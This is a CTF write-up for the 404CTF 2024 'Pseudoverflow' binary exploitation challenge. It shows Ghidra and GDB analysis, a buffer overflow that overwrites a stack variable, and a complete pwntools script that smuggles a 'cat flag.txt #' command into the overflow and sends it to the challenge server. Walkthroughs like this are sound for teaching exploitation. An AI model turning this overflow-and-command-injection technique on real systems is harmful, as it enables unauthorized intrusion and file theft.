Home CTFs | 404CTF_2024 | Exploitation de Binaire | Pseudoverflow
Post
Cancel

CTFs | 404CTF_2024 | Exploitation de Binaire | Pseudoverflow

Pseudoverflow

[pseudo_enonce.png]

Here we are given the course binray. When opened in Ghidra, we can see the following:

[pseaudo_main.png]

At first, we had two variables that had the hex values of perds and \0. But once we redefined the type of the first variable as an array of five characters it prints us like above.

We understand here that we need to modify the content of the var_to_modif variable.

If we look at the code in GDB, we can see where the variable is saved.

[pseudo_gdb_main.png]

We set a breakpoint at the leave instruction and run the program. We use a payload "A"*106+"B"*6 :

[pseudo_gdb_var.png]

As we can see, we have overwritten the content of the variable. Now we need to put the correct value. For that, I used a python code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
gagne = 0x656e676167
cmd = b"cat flag.txt #"
my_len = 106 - len(cmd)
payload = cmd + b"A"*my_len + p64(gagne)

#p = process("./course")
SERV = "challenges.404ctf.fr"
PORT = 31958
p = remote(SERV, PORT)

print(p.recvuntil(b"pseudo :").decode())
print(payload.decode())
p.sendline(payload)
p.recvline().decode()
print("[+] FLAG : "+p.recvuntil(b"}").decode())

As you can see, I wrote my payload (cat flag.txt #) at the beginning and then used some As as padding and finally, the overwrite is done by the hex value of the word gagne.

The # is very important. It allows to comment the rest of the payload. This allows us not to have an error when sending our shell-code.

And we get the flag:

[pseudo_flag.png]

The flag is 404CTF{0v3rfl0w}.

This post is licensed under CC BY 4.0 by the author.